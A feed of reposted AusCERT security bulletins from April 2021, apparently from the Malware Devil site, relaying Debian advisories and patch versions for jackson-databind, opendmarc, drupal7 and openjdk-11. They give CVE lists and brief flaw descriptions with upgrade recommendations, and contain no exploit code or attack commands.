MDFGQkZGREJCREUwNzgyMkVBQkI5Njk2RkNBQzBEMzg3QjU4NDcACgkQlvysDTh7
WEdsrxAAjTeqluBqDACrZyMd3ukFE1/rW0XPSDul6h/hB+UmrqcLQpHPE13UzPTL
vh17djVIAjzfUKRDLbkHdOlgYMRSPgu0Yo+OwEYZJHpxaAHl/v22zlxZZvcbCPvM
+9aa3VCjDzHCDaA7p04GDB9Vk8R+6usuFT3sm5/5UN98Sp0yS5y9cd9T3+pxr0Wm
EO9ev4bReKQiyK5U8CtgpbTMhM182+mnboJJ3doaj87F1Z2Br40etrNBVvRCKu0w
szbBoHza1iObMrns2QK5YEBncxVRxfTCuBv84W/fdSmwSkXKHdoeuUOenfeoCALh
BEOgq5RG5Lry881tW9Dbq3CvNRW+LK9ICCeLo24+zYaOSXcoqtx+fKkymXd7E5Zg
yovA75srR3Lcozv2YyNPnaCYGik1RaaQhI+X1Gj1k/ErkdGnptM543Hw6mj675uM
03l1ANlTDRtuCEa5kDiM9yQnzoVSwvAJv4rSe60RKXZlhzYAEsHU9EFsDNH8sja8
3qRuhHoLElbS9iLKA5ygmu8VB6wMYyvYSJvLYYItnOiPIp4WrRWHb5iqAodOILGa
rXSVIQQ+5Nynyz/cRB6G0PYN+Ff/UF2X7CxUNv0+3TWLbjQm0JgG6AkAkdW7nK2B
7n+d1v7Qjpa9i45l+YyW9A0InBJTZpy/hwXWUvX+2KjeCAKJFvE=
=sbrJ
– —–END PGP SIGNATURE—–

– ————————–END INCLUDED TEXT——————–

You have received this e-mail bulletin as a result of your organisation’s
registration with AusCERT. The mailing list you are subscribed to is
maintained within your organisation, so if you do not wish to continue
receiving these bulletins you should contact your local IT manager. If
you do not know who that is, please send an email to auscert@auscert.org.au
and we will forward your request to the appropriate person.

NOTE: Third Party Rights
This security bulletin is provided as a service to AusCERT’s members. As
AusCERT did not write the document quoted above, AusCERT has had no control
over its content. The decision to follow or act on information or advice
contained in this security bulletin is the responsibility of each user or
organisation, and should be considered in accordance with your organisation’s
site policies and procedures. AusCERT takes no responsibility for consequences
which may arise from following or acting on information or advice contained in
this security bulletin.

NOTE: This is only the original release of the security bulletin. It may
not be updated when updates to the original are made. If downloading at
a later date, it is recommended that the bulletin is retrieved directly
from the author’s website to ensure that the information is still current.

Contact information for the authors of the original document is included
in the Security Bulletin above. If you have any questions or need further
information, please contact them directly.

Previous advisories and external security bulletins can be retrieved from:

https://www.auscert.org.au/bulletins/

===========================================================================
Australian Computer Emergency Response Team
The University of Queensland
Brisbane
Qld 4072

Internet Email: auscert@auscert.org.au
Facsimile: (07) 3365 7031
Telephone: (07) 3365 4417 (International: +61 7 3365 4417)
AusCERT personnel answer during Queensland business hours
which are GMT+10:00 (AEST).
On call after hours for member emergencies only.
===========================================================================
—–BEGIN PGP SIGNATURE—–
Comment: http://www.auscert.org.au/render.html?it=1967

iQIVAwUBYIZZ1ONLKJtyKPYoAQgKSg//d4X1Wh7AzM1U1IH5T0bbKLVcRx04u4Se
fm3BJanMjUVJKO0TKcbxyrrewDsOUEW3Ow9gFoxnSHYdLO0vgq7Ft0bWXwntLSw4
T8efY8wa1Ag2eICwK0d1tw90URcMXkorSSqIhd7eYJYW0kA7ldlHefNEY73w1K+e
a2fEWWq8nPIuojHfSkr1Va6Dc/Oe8LtCJ4oZD2h4XWDgdobPee2zKtiOMJhFWZsu
RRZOM1o2kTUKn1TiD6dFjClcn4FM0YfJ5ykajwZSMKK/9dZq39SrjXWapWFOrlCT
PEMXNij08I3FDxRZUI2aeLQQ8LFWlXQSkEZPF6ZUlJzqyK1qYbV3IeGSts3ZcgmS
HCPCCkACnkZKDE27nX/sFqZwKBic5gsyOQ3CSyOhTF86yWIheTM+Nmnk8pJ5fL9j
UcFRoH1D8lUZ6Th3yuNEsSA1SfnEAefqFlFjt4f6L8sbfGzGdIuPRcDzuxJrc4qr
dGqJicUNMGE/3qgNuSCAvtjzAJVLLPgZYIURSgdhBuHd4HUQo4TsYHwDBJ3giGKm
3ZbIXXl8SapLtRNoKrwCZSDUrFaAMk+YKSr+EIOetDA2mSYcL6UaLKXTc6n95o5y
klYsvyiAO8453BQm5UXwtAgFS1wc7nmmkQW7YgiqLSi+eYvun8F9o3V4JVP4pIUL
n+wzRWa9fKU=
=Q+uL
—–END PGP SIGNATURE—–

Read More

The post ESB-2021.1396 – [UNIX/Linux][Debian] pjproject: Denial of service – Remote with user interaction appeared first on Malware Devil.

https://malwaredevil.com/2021/04/26/esb-2021-1396-unix-linuxdebian-pjproject-denial-of-service-remote-with-user-interaction/?utm_source=rss&utm_medium=rss&utm_campaign=esb-2021-1396-unix-linuxdebian-pjproject-denial-of-service-remote-with-user-interaction

ESB-2021.1397 – [Debian] jackson-databind: Multiple vulnerabilities

—–BEGIN PGP SIGNED MESSAGE—–
Hash: SHA256

===========================================================================
AUSCERT External Security Bulletin Redistribution

ESB-2021.1397
jackson-databind security update
26 April 2021

===========================================================================

AusCERT Security Bulletin Summary
———————————

Product: jackson-databind
Publisher: Debian
Operating System: Debian GNU/Linux
Impact/Access: Modify Arbitrary Files — Remote/Unauthenticated
Access Confidential Data — Remote/Unauthenticated
Reduced Security — Remote/Unauthenticated
Resolution: Patch/Upgrade
CVE Names: CVE-2021-20190 CVE-2020-36189 CVE-2020-36188
CVE-2020-36187 CVE-2020-36186 CVE-2020-36185
CVE-2020-36184 CVE-2020-36183 CVE-2020-36182
CVE-2020-36181 CVE-2020-36180 CVE-2020-36179
CVE-2020-35728 CVE-2020-35491 CVE-2020-35490
CVE-2020-25649 CVE-2020-24750 CVE-2020-24616

Reference: ASB-2021.0066
ASB-2021.0014
ESB-2021.0334

Original Bulletin:
http://www.debian.org/lts/security/2021/dla-2638

– ————————–BEGIN INCLUDED TEXT——————–

– —–BEGIN PGP SIGNED MESSAGE—–
Hash: SHA256

– – ———————————————————————–
Debian LTS Advisory DLA-2638-1 debian-lts@lists.debian.org
https://www.debian.org/lts/security/ Utkarsh Gupta
April 25, 2021 https://wiki.debian.org/LTS
– – ———————————————————————–

Package : jackson-databind
Version : 2.8.6-1+deb9u9
CVE ID : CVE-2020-24616 CVE-2020-24750 CVE-2020-35490
CVE-2020-35491 CVE-2020-35728 CVE-2020-36179
CVE-2020-36180 CVE-2020-36181 CVE-2020-36182
CVE-2020-36183 CVE-2020-36184 CVE-2020-36185
CVE-2020-36186 CVE-2020-36187 CVE-2020-36188
CVE-2020-36189 CVE-2021-20190

Multiple security vulnerabilities were found in Jackson Databind.

CVE-2020-24616

FasterXML jackson-databind 2.x before 2.9.10.6 mishandles the
interaction between serialization gadgets and typing, related
to br.com.anteros.dbcp.AnterosDBCPDataSource (aka Anteros-DBCP).

CVE-2020-24750

FasterXML jackson-databind 2.x before 2.9.10.6 mishandles the
interaction between serialization gadgets and typing, related
to com.pastdev.httpcomponents.configuration.JndiConfiguration.

CVE-2020-25649

A flaw was found in FasterXML Jackson Databind, where it did not
have entity expansion secured properly. This flaw allows
vulnerability to XML external entity (XXE) attacks. The highest
threat from this vulnerability is data integrity.

CVE-2020-35490

FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the
interaction between serialization gadgets and typing, related
to org.apache.commons.dbcp2.datasources.PerUserPoolDataSource.

CVE-2020-35491

FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the
interaction between serialization gadgets and typing, related
to org.apache.commons.dbcp2.datasources.SharedPoolDataSource.

CVE-2020-35728

FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the
interaction between serialization gadgets and typing, related to
com.oracle.wls.shaded.org.apache.xalan.lib.sql.JNDIConnectionPool
(aka embedded Xalan in org.glassfish.web/javax.servlet.jsp.jstl).

CVE-2020-36179

FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the
interaction between serialization gadgets and typing, related
to oadd.org.apache.commons.dbcp.cpdsadapter.DriverAdapterCPDS.

CVE-2020-36180

FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the
interaction between serialization gadgets and typing, related
to org.apache.commons.dbcp2.cpdsadapter.DriverAdapterCPDS.

CVE-2020-36181

FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the
interaction between serialization gadgets and typing, related
to org.apache.tomcat.dbcp.dbcp.cpdsadapter.DriverAdapterCPDS.

CVE-2020-36182

FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the
interaction between serialization gadgets and typing, related
to org.apache.tomcat.dbcp.dbcp2.cpdsadapter.DriverAdapterCPDS.

CVE-2020-36183

FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the
interaction between serialization gadgets and typing, related
to org.docx4j.org.apache.xalan.lib.sql.JNDIConnectionPool.

CVE-2020-36184

FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the
interaction between serialization gadgets and typing, related to
org.apache.tomcat.dbcp.dbcp2.datasources.PerUserPoolDataSource.

CVE-2020-36185

FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the
interaction between serialization gadgets and typing, related to
org.apache.tomcat.dbcp.dbcp2.datasources.SharedPoolDataSource.

CVE-2020-36186

FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the
interaction between serialization gadgets and typing, related to
org.apache.tomcat.dbcp.dbcp.datasources.PerUserPoolDataSource.

CVE-2020-36187

FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the
interaction between serialization gadgets and typing, related to
org.apache.tomcat.dbcp.dbcp.datasources.SharedPoolDataSource.

CVE-2020-36188

FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the
interaction between serialization gadgets and typing, related to
com.newrelic.agent.deps.ch.qos.logback.core.db.JNDICS.

CVE-2020-36189

FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the
interaction between serialization gadgets and typing, related to
com.newrelic.agent.deps.ch.qos.logback.core.db.DMCS.

CVE-2021-20190

A flaw was found in jackson-databind before 2.9.10.7. FasterXML
mishandles the interaction between serialization gadgets and
typing. The highest threat from this vulnerability is to data
confidentiality and integrity as well as system availability.

For Debian 9 stretch, these problems have been fixed in version
2.8.6-1+deb9u9.

We recommend that you upgrade your jackson-databind packages.

For the detailed security status of jackson-databind please refer to
its security tracker page at:
https://security-tracker.debian.org/tracker/jackson-databind

Further information about Debian LTS security advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://wiki.debian.org/LTS
– —–BEGIN PGP SIGNATURE—–

iQIzBAEBCAAdFiEEbJ0QSEqa5Mw4X3xxgj6WdgbDS5YFAmCEhEQACgkQgj6WdgbD
S5b0phAArpP2x7hIraTYxLJZNipQ+fLfO/psFKiJYMcajpEJ58KOm12m2wDYYDOx
PqWdE4xYDHC9A2voXAf2kOzEssJffYfquM7drKJx2Pi2PoHF0KK56l41buPxFGf5
yA/99egR6itnpmnDsQy1bhbfJS1C1PMJVFr+U0HygQmfWYzbf3YVGYsgz5W0ReJ8
ywSxCkDrEnRW19UL25DvIAb8lldtT3iV9RUGomV1e0Bpy/lQa3QLNfS/K1f61a3U
dsIa+ImqZnNH6zoagiJyFmoOkmpwoAp3QUhQ+fBu/9Lk1ImtpH1ResyDLlp538t6
VjDC0Ib9Nm9s4QOvaW9ut/0pHHVtyGuoZQKmwXSy7Y69mQA/P3fVgCugoIDRBMbE
EkJGyjHLYDPAQmrF9FsBVj+Di181Dv4ALlKUjbvvCZjyA9YGPHd8XpHqmrAW0b9s
ybBGAz0MhgZNlH+ZErLRWPHa+2d0jIp4yKTJPQRDHY+HDeG+q8/lFXYKnDFtLC18
bwXu1ExFGBW16bmdjIiaR7x2OcIBP/hXWSpga+O2Qs1ojfA2NIoM6BKpJw8ZIwtR
jCcgMNmPsc6V47J0zuY/yuBO8FgOq3rjScUpGs+wevaxKx/2hge2jogP8bnth8P6
GAgG7VlQ2VXbPzzHdskzqZqtmLqVZGURBD+qgT9DV1jVLRrnIo0=
=pfKI
– —–END PGP SIGNATURE—–

– ————————–END INCLUDED TEXT——————–

You have received this e-mail bulletin as a result of your organisation’s
registration with AusCERT. The mailing list you are subscribed to is
maintained within your organisation, so if you do not wish to continue
receiving these bulletins you should contact your local IT manager. If
you do not know who that is, please send an email to auscert@auscert.org.au
and we will forward your request to the appropriate person.

NOTE: Third Party Rights
This security bulletin is provided as a service to AusCERT’s members. As
AusCERT did not write the document quoted above, AusCERT has had no control
over its content. The decision to follow or act on information or advice
contained in this security bulletin is the responsibility of each user or
organisation, and should be considered in accordance with your organisation’s
site policies and procedures. AusCERT takes no responsibility for consequences
which may arise from following or acting on information or advice contained in
this security bulletin.

NOTE: This is only the original release of the security bulletin. It may
not be updated when updates to the original are made. If downloading at
a later date, it is recommended that the bulletin is retrieved directly
from the author’s website to ensure that the information is still current.

Contact information for the authors of the original document is included
in the Security Bulletin above. If you have any questions or need further
information, please contact them directly.

Previous advisories and external security bulletins can be retrieved from:

https://www.auscert.org.au/bulletins/

===========================================================================
Australian Computer Emergency Response Team
The University of Queensland
Brisbane
Qld 4072

Internet Email: auscert@auscert.org.au
Facsimile: (07) 3365 7031
Telephone: (07) 3365 4417 (International: +61 7 3365 4417)
AusCERT personnel answer during Queensland business hours
which are GMT+10:00 (AEST).
On call after hours for member emergencies only.
===========================================================================
—–BEGIN PGP SIGNATURE—–
Comment: http://www.auscert.org.au/render.html?it=1967

iQIVAwUBYIZbX+NLKJtyKPYoAQjtQg//eJ3VB+dde29l5RDo9nTQCAhK+JdNsVwi
QFGpXGjkvFeS+r/2gfKbNlK8rebANXaYQkl3K0e6IvBsPLrfMC/6bMGM3jWqnnuC
SWhAhGSqr5bzV2D73eGHpI/+eEXX9L9jYFxvAZpoR/T4/dN5uvWp6k7uMsuhhPWS
/sAhsriNsmdDnBQKXqGo6az5DX6OL0p+Ketqr7Xm9pG9Oai0Ulm7sq6Y7gG/5y5g
KAt/rH/HZ/8yUkWrlPTukpevdTBhrOVjt27We/OCOCjyLqR4hun2XvptUmtNhsU2
CHzAOyXFZdJrIfs6zVuI520w9EV62bAtLLjILh2HB+ZEzKr7C3DkI64eb2FWRNNL
RFgIoHMN4M4ffKQcwiJ6siaY8tO8mCfeAWE/O+YODqcUA7RGvXAt1np6VPirBGZk
Txd4pKarMYwi0bFbe1jfhMcnFSe9F84Xk2nGk6Kl4XpEr58YKH3shwztb7U4hKb9
A80XQFzm8W77idQyfZr9eYSt35bLIBK8AV0Jy8LVNTS/PTz9icI5I7xi1r5sBrvv
vTnJtCJiKxGStHqZSHbhBZH5D7v0as1qSY4jrteaMQJg7K09lbjCaptHGGNY7lO6
oHzZEoTzqrtl20s6Gfef8v1/9hFncx5mw2bt2DN/JAgAnAZCT9VlLJ+bEHCZXt7y
RLp9NtVXEgg=
=ynYc
—–END PGP SIGNATURE—–

Read More

The post ESB-2021.1397 – [Debian] jackson-databind: Multiple vulnerabilities appeared first on Malware Devil.

https://malwaredevil.com/2021/04/26/esb-2021-1397-debian-jackson-databind-multiple-vulnerabilities/?utm_source=rss&utm_medium=rss&utm_campaign=esb-2021-1397-debian-jackson-databind-multiple-vulnerabilities

ESB-2021.1398 – [Win][UNIX/Linux][Debian] opendmarc: Multiple vulnerabilities

—–BEGIN PGP SIGNED MESSAGE—–
Hash: SHA256

===========================================================================
AUSCERT External Security Bulletin Redistribution

ESB-2021.1398
opendmarc security update
26 April 2021

===========================================================================

AusCERT Security Bulletin Summary
———————————

Product: opendmarc
Publisher: Debian
Operating System: Debian GNU/Linux
UNIX variants (UNIX, Linux, OSX)
Windows
Impact/Access: Denial of Service — Remote/Unauthenticated
Reduced Security — Remote/Unauthenticated
Resolution: Patch/Upgrade
CVE Names: CVE-2020-12460

Original Bulletin:
http://www.debian.org/lts/security/2021/dla-2639

Comment: This advisory references vulnerabilities in products which run on
platforms other than Debian. It is recommended that administrators
running opendmarc check for an updated version of the software for
their operating system.

– ————————–BEGIN INCLUDED TEXT——————–

– —–BEGIN PGP SIGNED MESSAGE—–
Hash: SHA256

– – ———————————————————————–
Debian LTS Advisory DLA-2639-1 debian-lts@lists.debian.org
https://www.debian.org/lts/security/ Utkarsh Gupta
April 25, 2021 https://wiki.debian.org/LTS
– – ———————————————————————–

Package : opendmarc
Version : 1.3.2-2+deb9u3
CVE ID : CVE-2020-12460
Debian Bug : 966464

It was discovered that OpenDMARC, a milter implementation of DMARC,
has improper null termination in the function opendmarc_xml_parse that
can result in a one-byte heap overflow in opendmarc_xml when parsing a
specially crafted DMARC aggregate report. This can cause remote memory
corruption when a ” byte overwrites the heap metadata of the next
chunk and its PREV_INUSE flag.

For Debian 9 stretch, this problem has been fixed in version
1.3.2-2+deb9u3.

We recommend that you upgrade your opendmarc packages.

For the detailed security status of opendmarc please refer to
its security tracker page at:
https://security-tracker.debian.org/tracker/opendmarc

Further information about Debian LTS security advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://wiki.debian.org/LTS
– —–BEGIN PGP SIGNATURE—–

iQIzBAEBCAAdFiEEbJ0QSEqa5Mw4X3xxgj6WdgbDS5YFAmCFHvgACgkQgj6WdgbD
S5bUDg/8CM67T/PokGkZKrkpAh3QJqKXfgyb2ACRgByAFxgZdrimq/M8xCk1wQOa
nvL1YLwJIl7G3CHQEu4TjZRdCabZLfedLroCBJNOabsvREyDxvgZiRr/f4xUh3+/
8XVKBh37hnjNlxu2loQTUwdgjtNUO7xlV6YWmlAkDG9qnXgjv5YvJ+rAhev+s/8Z
HDKREDlWWQv5/cFt2GwWpIuER0qRz1ZXK16qZiubYb26UW9Jpf6FBqt1Rf0Ej4bf
cSiQB8sOUoyWyVbJk/nzkuOc2oJKwUWp/DeVzow1xJoOI6OINUOUxsOQXRyg1WBu
6bRiLhaamY7bD/2hDMpsn/S7wWx2Ht+rsQ3sfwlJYsc8RNTR98qZ0JWEdCTQBVDT
P5PCBE62uO40qBYiUf2xF740wpUoRqOqKEbAhMsJOL35H3GeuD+JjpOoMXYVG8Wx
HRVDtppzwT6Hx11boeyYqYWJ34rFLJltJ1yVCNLkGzjBWh/pxFm9/HH3/qrpd1Gq
eOpJfuL//XMe3awbuNhoxaZ+YpJCKXeWa+zASvguz8vNtQ6BVlOz1oXlNJVlMe3D
3szjvJVRaWmhcQz6ZRZ0Y9ZSLcM64T8/V+LvbSEvmsU/5qecUuFMoZlsHlGooCt3
KUrXDVtFULHojaeamwNkLJ/msf1990tQB8cg2CbB2t0FopQheM4=
=OvqJ
– —–END PGP SIGNATURE—–

– ————————–END INCLUDED TEXT——————–

You have received this e-mail bulletin as a result of your organisation’s
registration with AusCERT. The mailing list you are subscribed to is
maintained within your organisation, so if you do not wish to continue
receiving these bulletins you should contact your local IT manager. If
you do not know who that is, please send an email to auscert@auscert.org.au
and we will forward your request to the appropriate person.

NOTE: Third Party Rights
This security bulletin is provided as a service to AusCERT’s members. As
AusCERT did not write the document quoted above, AusCERT has had no control
over its content. The decision to follow or act on information or advice
contained in this security bulletin is the responsibility of each user or
organisation, and should be considered in accordance with your organisation’s
site policies and procedures. AusCERT takes no responsibility for consequences
which may arise from following or acting on information or advice contained in
this security bulletin.

NOTE: This is only the original release of the security bulletin. It may
not be updated when updates to the original are made. If downloading at
a later date, it is recommended that the bulletin is retrieved directly
from the author’s website to ensure that the information is still current.

Contact information for the authors of the original document is included
in the Security Bulletin above. If you have any questions or need further
information, please contact them directly.

Previous advisories and external security bulletins can be retrieved from:

https://www.auscert.org.au/bulletins/

===========================================================================
Australian Computer Emergency Response Team
The University of Queensland
Brisbane
Qld 4072

Internet Email: auscert@auscert.org.au
Facsimile: (07) 3365 7031
Telephone: (07) 3365 4417 (International: +61 7 3365 4417)
AusCERT personnel answer during Queensland business hours
which are GMT+10:00 (AEST).
On call after hours for member emergencies only.
===========================================================================
—–BEGIN PGP SIGNATURE—–
Comment: http://www.auscert.org.au/render.html?it=1967

iQIVAwUBYIZhweNLKJtyKPYoAQgUPA/5Ae5sfxRr6znNiWmiP3XbOtaxdF7yry4J
bjvYrvXVMVtMYYuAewQW8h5uqFjt9bMPzkyvzDE91v/fIaGnuMr33MwQ9iLqa0CY
CmOAZKpUgABuSbUrB0XKPFZ5RPdYPNt48BRZ0CzdWfyLzdv2XNM6Vx8dg9br4Zaa
lzzkidIUQpRcZjv2TH9BkHZ57BGPJIp02etQyHfpuk882ZzJuZyPBrV9V039tHtw
BwBKws8Ls7DGWNX96gUOLkkg90Rmf9tWuuofI9HAn9cNYH8zUiUFVvgvXQTf/n+x
JeGTYJHwmIBY3DaDQPuNRQ6A9Mi0oCGovQg3IVYjKtGzvwzxB2gXFNO0zhSf3XOX
U2ibxBfuz2zKsP7cqQ/8C3J9KhGEr88H42cQk+793XLuuKBYpq1VT+BYh3QKXJtu
qzGp19crtoVdd0XqkzXvSVa2FMnsebYP3sFHTwNeEY0MRmuO4yD6p+nT5Rt1TlRT
bIHFvLC4/Swdj5KAXAXy7saq59MdR1yGHlKbRNDzgkH1aiqux0ukFx8NehE/uGW8
EyqA0bzBATPzd2becvIFo1jCNucFNyw/X+1bu64zIFVypOv1GxC/cfr69XNc668e
QvlrnGTd2zhsmOLzc5zYzI+n9WPEwW259EKLHOnMJV+k6oMt+hy1bspzwipVcuI/
HpRroebu4jc=
=FiVo
—–END PGP SIGNATURE—–

Read More

The post ESB-2021.1398 – [Win][UNIX/Linux][Debian] opendmarc: Multiple vulnerabilities appeared first on Malware Devil.

https://malwaredevil.com/2021/04/26/esb-2021-1398-winunix-linuxdebian-opendmarc-multiple-vulnerabilities/?utm_source=rss&utm_medium=rss&utm_campaign=esb-2021-1398-winunix-linuxdebian-opendmarc-multiple-vulnerabilities

ESB-2021.1399 – [Debian] drupal7: Cross-site scripting – Unknown/unspecified

—–BEGIN PGP SIGNED MESSAGE—–
Hash: SHA256

===========================================================================
AUSCERT External Security Bulletin Redistribution

ESB-2021.1399
drupal7 security update
26 April 2021

===========================================================================

AusCERT Security Bulletin Summary
———————————

Product: drupal7
Publisher: Debian
Operating System: Debian GNU/Linux
Impact/Access: Cross-site Scripting — Unknown/Unspecified
Resolution: Patch/Upgrade

Original Bulletin:
http://www.debian.org/lts/security/2021/dla-2637

– ————————–BEGIN INCLUDED TEXT——————–

– —–BEGIN PGP SIGNED MESSAGE—–
Hash: SHA256

– – ———————————————————————–
Debian LTS Advisory DLA-2637-1 debian-lts@lists.debian.org
https://www.debian.org/lts/security/ Gunnar Wolf
April 23, 2021 https://wiki.debian.org/LTS
– – ———————————————————————–

Package : drupal7
Version : 7.52-2+deb9u15

The Drupal project identified a vulnerability in the sanitization
performed in the _filter_xss_arttributes function, potentially
allowing a cross-site scripting, and granted it the Drupal Security
Advisory ID SA-CORE-2021-002:

https://www.drupal.org/sa-core-2021-002

No CVE number has been announced.

For Debian 9 “Stretch”, the fix to this issue was backported in
version 7.52-2+deb9u15.

We recommend you upgrade your drupal7 package.

For detailed security status of drupal7, please refer to its security
tracker page:

https://security-tracker.debian.org/tracker/source-package/drupal7

Further information about Debian LTS security advisories, how to
apply these updates to your system, and other frequently asked
questions can be found at:

https://wiki.debian.org/LTS

– —–BEGIN PGP SIGNATURE—–

iHUEARYIAB0WIQRgswk9lhCOXLlxQu/i9jtDU/RZiQUCYIMubAAKCRDi9jtDU/RZ
iWn/AP40rhBJ+FJXOLacDMle2Sc0aLBjuP55OFhOVmWsSchm6AD+PgCg3zHyvOyj
7ZMI0BP3NiMAZAOMlXJpDIVwGINd9Qc=
=DPfS
– —–END PGP SIGNATURE—–

– ————————–END INCLUDED TEXT——————–

You have received this e-mail bulletin as a result of your organisation’s
registration with AusCERT. The mailing list you are subscribed to is
maintained within your organisation, so if you do not wish to continue
receiving these bulletins you should contact your local IT manager. If
you do not know who that is, please send an email to auscert@auscert.org.au
and we will forward your request to the appropriate person.

NOTE: Third Party Rights
This security bulletin is provided as a service to AusCERT’s members. As
AusCERT did not write the document quoted above, AusCERT has had no control
over its content. The decision to follow or act on information or advice
contained in this security bulletin is the responsibility of each user or
organisation, and should be considered in accordance with your organisation’s
site policies and procedures. AusCERT takes no responsibility for consequences
which may arise from following or acting on information or advice contained in
this security bulletin.

NOTE: This is only the original release of the security bulletin. It may
not be updated when updates to the original are made. If downloading at
a later date, it is recommended that the bulletin is retrieved directly
from the author’s website to ensure that the information is still current.

Contact information for the authors of the original document is included
in the Security Bulletin above. If you have any questions or need further
information, please contact them directly.

Previous advisories and external security bulletins can be retrieved from:

https://www.auscert.org.au/bulletins/

===========================================================================
Australian Computer Emergency Response Team
The University of Queensland
Brisbane
Qld 4072

Internet Email: auscert@auscert.org.au
Facsimile: (07) 3365 7031
Telephone: (07) 3365 4417 (International: +61 7 3365 4417)
AusCERT personnel answer during Queensland business hours
which are GMT+10:00 (AEST).
On call after hours for member emergencies only.
===========================================================================
—–BEGIN PGP SIGNATURE—–
Comment: http://www.auscert.org.au/render.html?it=1967

iQIVAwUBYIZiU+NLKJtyKPYoAQi7hxAArC0d+l22iKmCZ3l6fe0tvwFN4ggd604E
A0vCTCpVKhgUkE09ZUqAKz+B+WDOV7ybRPNerCeCEeTuQnhlBoJv++3Sv9EFINhN
zG8YXvf1b0+V+n/bEQQFV1Lhjg0lw1/dN7Zml7UFJHz5nR3yicoUEdCB9GeTHwRa
MaY/hEwGHl8YScEA/LTrAzncjESDtOS4kS7L+g1xakZ661YbHycSHEVAz4EADRJg
+aXBv0XEABPbbZcgwsH3CPPXXrSG+V06KHura5XDwFsb/gR5+6oz010vkZ0qn+y0
BbEUhOpt/s6Uqnfpmd5l7xMIwXCY+Y+8sD1fPXQ9pMmZcb/YNsqzBw4vFGc5kjYs
W9LlEtSt81kfqXFVjV2e8rzMc64PKACl+deXqtWnRTpLDDz7TRrEviOY2AaamJ8H
gC4QGn/Poxx7zrxBVPhO63prFYCdY6XL3kYF/Ugx6YxeLRpSZ0yK5jFy1sk63X8I
6zZVuxdE24QyVfXKzRi3xzivNDFiHjgDWQfMdSgDzEud6CmhrI8hiN6slq+I1xJI
vgYysxpaWuAm3CQF7M1uudJewjTjINPag8e8HtSAwSF/+329xisvnxcUVVpWDvgi
QlCHialXO2UgKPlxXOOaeXF2wZHzCqGOA9VASvKgmBRGXFdnmmsfaAwWLx1mToe9
HwkY2vqPW9A=
=8+Ey
—–END PGP SIGNATURE—–

Read More

The post ESB-2021.1399 – [Debian] drupal7: Cross-site scripting – Unknown/unspecified appeared first on Malware Devil.

https://malwaredevil.com/2021/04/26/esb-2021-1399-debian-drupal7-cross-site-scripting-unknown-unspecified/?utm_source=rss&utm_medium=rss&utm_campaign=esb-2021-1399-debian-drupal7-cross-site-scripting-unknown-unspecified

ESB-2021.1400 – [Debian] openjdk-11: Multiple vulnerabilities

—–BEGIN PGP SIGNED MESSAGE—–
Hash: SHA256

===========================================================================
AUSCERT External Security Bulletin Redistribution

ESB-2021.1400
openjdk-11 security update
26 April 2021

===========================================================================

AusCERT Security Bulletin Summary
———————————

Product: openjdk-11
Publisher: Debian
Operating System: Debian GNU/Linux
Impact/Access: Modify Arbitrary Files — Remote/Unauthenticated
Access Confidential Data — Remote/Unauthenticated
Resolution: Patch/Upgrade
CVE Names: CVE-2021-2161

Reference: ASB-2021.0076
ESB-2021.0701

Original Bulletin:
http://www.debian.org/security/2021/dsa-4899

– ————————–BEGIN INCLUDED TEXT——————–

– —–BEGIN PGP SIGNED MESSAGE—–
Hash: SHA512

– – ————————————————————————-
Debian Security Advisory DSA-4899-1 security@debian.org
https://www.debian.org/security/ Moritz Muehlenhoff
April 23, 2021 https://www.debian.org/security/faq
– – ————————————————————————-

Package : openjdk-11
CVE ID : CVE-2021-2161

It was discovered that the OpenJDK Java platform incompletely enforced
configuration settings used in Jar signing verifications.

For the stable distribution (buster), this problem has been fixed in
version 11.0.11+9-1~deb10u1.

We recommend that you upgrade your openjdk-11 packages.

For the detailed security status of openjdk-11 please refer to
its security tracker page at:
https://security-tracker.debian.org/tracker/openjdk-11

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org
– —–BEGIN PGP SIGNATURE—–

iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmCDKPUACgkQEMKTtsN8
TjZZOQ/9HjEtAPhML2FPJSlmH9rEELNkGMwOhgc34MF1RjLw0BUll3UPY7Yo2caL
KrDpzsZ3awRJNlp+i4m5Fk87kIUpXi08JP9nGe1aaQk/8HjTJD/hZ7SBf+fqtgDZ
cNzQEK93hBma3/aB1HAAmYPzAFdOuS6M23P77mlmoffNC58EkiIiqXHlRRVfaa03
wKxn/nX1W5aDpDtOCBqw4oouVM7d6lEAX6Di9MmBSye3CSIAzH/fcTNi1IBGF4la
Eq46iLzb0guadkkbZNEpTzK2K02OJdKDCINWnJa7tLPH8oQ9cSW1gz7hpbyUNchf
VWZphQ1dVOaHDcAfWpWRwKTmVjd3/n/mBSdOyFUQOxSTlOdwTvLVCE0KOLxYaE7p
OhsGXAWFST0N3zo8TP+JM4AKu5xI4Pd0zllRLoQ+3fDk2p5etnY6pwKYF4m4LT3T
+JvXGTf030Lq9aG/9yY31Mgn1S6QZe65/KW00tFgwsKTeNZPiU9K3Oq/+NFjuZmK
+f7tgXfP1KwgD4eS8kuXuty93nWHOYLkaEAaTwY5DRl2NZWAuFLBsYpC+iroZf3F
ADUzH8rIuwX8D8DJY6ey679R96XDNXDY5voIwbLu6FTDdp0voViXYXRp9CN5HWrh
kaFS5gAXlKhq9lHrhuiVppp5x05Muq/faunTE+Dw8aC7a0wPbrc=
=deH3
– —–END PGP SIGNATURE—–

– ————————–END INCLUDED TEXT——————–

You have received this e-mail bulletin as a result of your organisation’s
registration with AusCERT. The mailing list you are subscribed to is
maintained within your organisation, so if you do not wish to continue
receiving these bulletins you should contact your local IT manager. If
you do not know who that is, please send an email to auscert@auscert.org.au
and we will forward your request to the appropriate person.

